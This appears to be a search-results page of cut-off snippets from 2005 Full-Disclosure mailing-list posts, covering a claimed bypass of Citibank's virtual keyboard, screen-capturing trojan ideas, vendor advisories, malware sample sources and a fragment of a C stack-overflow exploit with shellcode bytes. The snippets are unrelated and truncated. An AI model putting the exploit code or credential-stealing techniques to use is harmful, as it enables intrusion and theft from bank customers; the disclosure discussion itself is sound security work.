Aditya Deshmukh wrote:
The only most secure protection is a one time password with a challenge /
response scheme. Most of the banks in europe already do this.
They give out a calculator like device to the customers and when u want to
login you are presented with a challenge that you punch into
On August 02, 2005, CA released patches to address a buffer
overflow vulnerability in some of the BrightStor ARCserve Backup
and BrightStor Enterprise Backup for Windows application agents.
The patch for BrightStor ARCserve Backup r11.1 Agent for SQL for
Windows (QO70767) did not fully remediate
The only most secure protection is a one time password with a challenge /
response scheme. Most of the banks in europe already do this.
They give out a calculator like device to the customers and when u want to
login you are presented with a challenge that you punch into you device
which spits a r
> > proximity of mouse cursor on every mouse click? It's not that
> > resource consuming, and easy to arrange.
>
> You'd need to squeeze in some OCR code as well, or figure it out
> manually (or maybe use the same techniques as for getting around
> "captchas").
Another simple method capture the s
Hi,
>As per my knowledge, there are no such keyloggers or spywares which uses
any technique to defeat virtual keyboards.
>However, the technique that I am going to discuss here can be used by
malicious program writers to write next generation >viruses / worms to
defeat such virtual keyboard prot
Sweet and Simple - This is how this program works.
A brief on the algo~m is given below -
Step1: Enumerate all the IE windows and look for the one with CitiBank Login
screen (This step is invoked when an IE is opened and a partucular URL is
requested)
Step2: If found then Create a HTML object
Peter Ferrie wrote:
Recently I discovered a method to defeat the much hyped Citi-Bank
Virtual Keyboard Protection which the bank claimed that it defends the
customers against malicious programs like keyloggers, Trojans and
spywares etc.
Wouldn't that be trivial to snoop on simply b
MZ,
>> What I proposed (and I'm sure I'm not innovative here) went along the
lines of hooking up and intercepting the mouse
>> click button, and then, at the exact moment of mouse click, capturing the
position of the mouse pointer, and a bitmap
>> of its nearest surroundings - ideally, before
EMC Navisphere Manager Directory Traversal Vulnerability
iDEFENSE Security Advisory 08.05.05
www.idefense.com/application/poi/display?id=288&type=vulnerabilities
August 05, 2005
I. BACKGROUND
EMC Navisphere storage management software is a suite of tools that
enables discovery, monitoring, prov
On Fri, 5 Aug 2005, Jeremy Bishop wrote:
> You'd need to squeeze in some OCR code as well, or figure it out
> manually (or maybe use the same techniques as for getting around
> "captchas").
Well, if carders can be bothered to review hours of recorded material from
ATM-mounted cameras to grab PINs
On Sat, 6 Aug 2005, Debasis Mohanty wrote:
> Read the description section again, perhaps you have missed out the
> following -
> . The Virtual Keyboard is dynamic
> . The sequence in which the numbers appears will change every time,
> the page is refreshed
>
> Hence, desiging something the
On Friday 05 August 2005 13:10, Michal Zalewski wrote:
> Wouldn't that be trivial to snoop on simply by making a trojan /
> spyware application that records a section of screen in the immediate
> proximity of mouse cursor on every mouse click? It's not that
> resource consuming, and easy to arrange
>> Wouldn't that be trivial to snoop on simply by making a trojan / spyware
application that records a section of screen
>> in the immediate proximity of mouse cursor on every mouse click? It's not
that resource consuming, and easy to
>> arrange.
Read the description section again, perhaps you
>> Recently I discovered a method to defeat the much hyped Citi-Bank
>> Virtual Keyboard Protection which the bank claimed that it defends the
>> customers against malicious programs like keyloggers, Trojans and
>> spywares etc.
>
>Wouldn't that be trivial to snoop on simply by making a trojan
On Sat, 6 Aug 2005, Debasis Mohanty wrote:
> Recently I discovered a method to defeat the much hyped Citi-Bank
> Virtual Keyboard Protection which the bank claimed that it defends the
> customers against malicious programs like keyloggers, Trojans and
> spywares etc.
Wouldn't that be trivial to s
Recently I discovered a method to defeat the much hyped Citi-Bank Virtual
Keyboard Protection which the bank claimed that it defends the customers
against malicious programs like keyloggers, Trojans and spywares etc.
Find the details below -
Description:
Early this year, Citi-Bank introduced th
edward GAGNON wrote:
> int main(int argc, char *argv[])
> {
>
> char cmd[500];
>
> [...]
>
> path = argv[1];
>
> sprintf(cmd, "%s ", path);
classical stack overflow ;)
--
_
~ DI (FH) Bernhard Mueller
~ IT Security Consultant
~ SEC-Cons
#include
#include
#include
int main(int argc, char *argv[])
{
char cmd[500];
char *path;
printf("\n\n* usage: pdvdx.exe \n\n");
if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); }
path = argv[1];
sprintf(cmd, "%s ", path);
strcat(cmd, "\x44\x80\xC1\x77");
strcat(cmd, "\xDC\x7A\x
Bug Traq wrote:
Paste this URL in a firefox browser address bar and see what happens.
http://https/;//gmail.google.com
Anyone know why?
same thing happens when you just stick in 'https' at the address box.
firefox probably shoots out a google query for 'https' right away...
checkout google
On 8/5/05, mike king <[EMAIL PROTECTED]> wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Thanks for all the feedback. I have always taken the poor mans
> approach to this since its not really my job, but a fun hobby on
> the side.
for poor man's approach start with something easier l
/*
*
$ An open security advisory #11 - Lantronix SCS Local Root Exploits
***
hi,
> I'm now becoming very interested in learning more about malicious code
> analysis in a virtual machine environment. I have read documentation
> and set up the environment and tools etc.. However I have no malicious
> code to look at! does anyone know of a way to get hold of some?
>
> Also,
Bug Traq wrote:
Paste this URL in a firefox browser address bar and see what happens.
http://https/;//gmail.google.com
Anyone know why?
same thing happens when you just stick in 'https' at the address box.
firefox probably shoots out a google query for 'https' right away...
checkout google
Someone asked for the video of Cisco riping shit out:
http://42.pl/lynn/cisco.mov
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
here is what "responsible disclosure" means:
according to:
http://www.theregister.co.uk/2005/07/29/cisco_settles_rogue_researcher_dispute/
"Cisco's actions (regarding) Mr. Lynn and Black Hat were not based on the fact
that a flaw was identified, rather that they chose to address the issue outsid
>
> If your bored, go and get a book. Belive me: it won't bite you.
>
Is that an attempt to be funny?
JA. JA. JA.
The only one that needs reading a book its you,
I recomend for you "TCP IP Ilustrated" ... and learn how ICMP works
> FYI, my website is http://www.gont.com.ar .
> My site does not
Hi SkyLined,
This is more than just a claim.
I am using facts that were presented in the Bugzilla post by Shutdown, and were accepted by the Mozilla team.
Combining those facts with your heap spraying method in mind, make this vulnerability a high risk that should be addressed as one in the advi
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200508-04
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Thanks for all the feedback. I have always taken the poor mans
approach to this since its not really my job, but a fun hobby on
the side.
regards mike
On Fri, 05 Aug 2005 02:49:49 -0700 Peter Kruse <[EMAIL PROTECTED]> wrote:
>Hey,
>
>> These were not
Hey,
> These were not submitted to any AV vendors since Norton did flag them.
> In the past I have submitted unknown trojans/ viruses like these to
> Symantec when clients have been owned, but what can I say they are
> hardly 0day more like 300 day.
8-)
> http://www.bitsum.com/pec2.asp
Yes,
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Peter,
Hello back. Hey thanks for the reply and not a flame.
These were not submitted to any AV vendors since Norton did flag
them. In the past I have submitted unknown trojans/ viruses like
these to Symantec when clients have been owned, but what ca
Hi Mike,
I was just wondering if you have submitted these lastad samples to any
antivirus vendors?
Although this malware is already identified by several vendors, some don't
detect any of these "lastad" variants posted on your website. A good way to
ensure that samples gets added for detection, a
I found it helpful to use the SoTM's from the Honeynet project that
focused on Malicious code RCE. Try 32 & 33. Best thing is you get to
see how other people went about doing it to.
http://www.honeynet.org/scans/scan32/
http://www.honeynet.org/scans/scan33/
Goodluck,
Ty
On 8/4/05, M4ch3T3 Hax
Or just go to http://vx.netlux.org
On 8/5/05, M4ch3T3 Hax <[EMAIL PROTECTED]> wrote:
> Hello all,
>
> I have recently graduated from a computers & networking course at
> university and have spent alot of my time analysing network security
> from a scanning/sniffing/hardening point of view.
>
> I
34 matches
Mail list logo